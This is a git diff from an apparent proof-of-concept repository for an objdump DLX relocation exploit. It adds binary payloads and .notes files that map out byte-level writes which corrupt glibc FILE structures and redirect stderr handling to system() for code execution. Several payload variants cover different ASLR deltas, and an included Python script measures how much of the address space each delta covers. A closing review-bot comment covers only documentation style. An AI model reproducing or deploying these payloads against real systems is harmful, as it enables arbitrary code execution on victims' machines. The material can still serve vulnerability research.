b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes 
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..08b387c203f0286d10673da49263b60bac640f8a GIT binary patch literal 1280 zcmd5*+e%wO6kR7L=3Xun$EsUND;AM6gf&h5kgJ z)PL|%8$ZAwC<^rtd^oOsZXV}B`sl#S+H37~c4j7fel9G3vJw`eVXggU924wYFE{0_ zV@M+vd0$kJ*aPe=kf;I4tm|IZfi~eSASHMOq(yH48S>l>kQLmF0ZvnlcUjcohF9Q7u|LO*U z8ypO9=-C@(vDp8@o$*loz=G?##ALzeNyc%W#`Wk~EZ=VU^M;@M#(m6RH2l4Wf56DU zG4jJke#FSXZA{2^qy3K?{t3fhu2=rX&o^WEKN$XxD_;4ie#P*AHvCKEa1ogfPK_&*>$CNq5J^75sp z!V$)43h{oNCFdK7Mwly7VgF-3$XpO*N*(W>i5X7m3*o`ASj##mY2#$8dw%K7@qiO# Z*k8DO^Fn_Kf43~jM_t}C<{r7f_XpdLfS~{Y literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..a70a66f --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes 
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..050c5e949c58bc3ace505698c91cb102d9f0cda6 GIT binary patch literal 1280 zcmd5*+e%wO6kR7L=3Xun$EsUND;AM6gf&h5kgJ z)PL|%8$ZA=s6zb%AC7CEo5y*OJ~}Y7_F8+Lotep=p9{;Mtb~PVSZlu-#{~P<%T0Of z7}7{Z-WL@l_5eEzBx*o1>$;b9piOuSNC{p6Y0(=%hCFuzWCeM?cENv~f_Fd%(LMq4 zf~P>IeD@1@WwUk;=%SwN0J=rL1`49@0Y%Ykz-#J%x_}y^Lp^UWCk4~GBaidR0WUorfj4gV6k+-rEBD~x4? z{HsqRzWRjgNoWP_K$oGXpx;4HL(f3ZLceE9(#$Iw6dj5dMUSFM(WPip^f~l7Qinc= zK8NqG)T|yiQQE9-9BqH!J=m(FbXcuD;rhpZbA1CP-8}ShCy0VQ{trlx$qe7QynN}Y zaD;K1LcAYm$@xa25$1|i*#DRhG8aUdQpdYzVun-tLU=GN*0Rn?+Bn(jo?m)%Jm3Tw Z_7^VSywG35-z`h>QJ43Oxkv8r{Q=$CfT92Z literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..db848c5 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes 
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..05ff64425110398d125c38f83e640d443d6daf1f GIT binary patch literal 1280 zcmd5*%}QHA7(F*PdK05o6SdU}E)*&ViF0GsQc8tT6)GsW5bUBT#vc+jI1%isuh5rp zrM`nptv-M+P!#GLba8vW`{#8Q;?jYc^PTgZ`(z`ictp7Z74|=7!psFxrquE8nV8{}z7QS`i?ytCk`_+3y6>0X91A%? ahP}k)n;!;C^t)wAKIrnE@#%pFd;bsJ+km0~ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes new file mode 100644 index 0000000..a345387 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes 
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py b/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py
new file mode 100644
index 0000000..8f15052
--- /dev/null
+++ b/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python3
+from collections import Counter
+
+
+STDERR = 0x2044E0
+SYSTEM = 0x58750
+PAGE = 0x1000
+
+
+def be_from_le32(value):
+ return int.from_bytes((value & 0xFFFFFFFF).to_bytes(4, "little"), "big")
+
+
+def delta_for_base(base):
+ src = be_from_le32((base + STDERR) & 0xFFFFFFFF)
+ dst = be_from_le32((base + SYSTEM) & 0xFFFFFFFF)
+ return (dst - src) & 0xFFFFFFFF
+
+
+def main():
+ counts = Counter(delta_for_base(base) for base in range(0, 1 << 32, PAGE))
+ total = sum(counts.values())
+ covered = 0
+ for delta, count in counts.most_common():
+ covered += count
+ print(f"0x{delta:08x} pages={count} coverage={count / total:.6f} cumulative={covered / total:.6f}")
+ print(f"unique={len(counts)} total_pages={total}")
+
+
+if __name__ == "__main__":
+ main()
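Review bot: `STDERR`, `SYSTEM` and `PAGE` are bare magic numbers with nothing recording which glibc build and layout they were measured on, so the histogram silently describes the wrong build once the constants go stale; the .notes files added alongside carry a `layout=` tag, but this script does not. A comment above them such as `# glibc symbol offsets for the single build/layout this tool models; keep in sync with the payload .notes` would make that assumption visible at the point of use. `be_from_le32` also deserves a one-line docstring — `"""Byte-swap a 32-bit value: its little-endian encoding read back as big-endian."""` — since the nested to_bytes/from_bytes is the whole function, and `delta_for_base` and `main` have no docstring stating what the printed `coverage` and `cumulative` figures are fractions of (page counts out of `total`, per the code). The module has no docstring either; a sentence naming the question the output answers would help anyone reading the histogram without the analysis document.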